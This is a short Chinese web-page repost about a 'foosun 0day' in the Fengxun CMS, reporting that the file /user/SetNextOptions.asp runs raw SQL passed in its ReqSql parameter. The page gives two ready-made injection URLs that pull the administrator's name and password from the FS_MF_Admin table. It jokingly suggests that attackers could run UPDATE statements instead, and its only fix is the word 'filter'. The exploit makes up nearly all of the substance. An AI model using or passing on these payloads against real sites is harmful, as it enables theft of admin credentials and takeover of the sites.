好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

foosun 0day 最新爆管理员账号密码漏洞及修复 - 网

风讯foosun的注册文件存在漏洞。黑客们可以暴管理员帐号和密码。

漏洞文件: www.2cto.com /user/SetNextOptions.asp 利用简单的方法:

暴管理员帐号: http://www.2cto.com /user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin 暴管理员密码: http://www.2cto.com /user/SetNextOptions. asp ?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin

如果得不到密码黑阔们也可以考虑 update 。。。很邪恶喔。。哈

修复:过滤

from:久久久电脑

查看更多关于foosun 0day 最新爆管理员账号密码漏洞及修复 - 网的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did11626
  阅读:41次

上一篇: WordPress中timthumb.php远程文件存储漏洞分析 - 网站

下一篇:IdeaCMS 2.1 建站系统后台拿shell - 网站安全 - 自学

相关资讯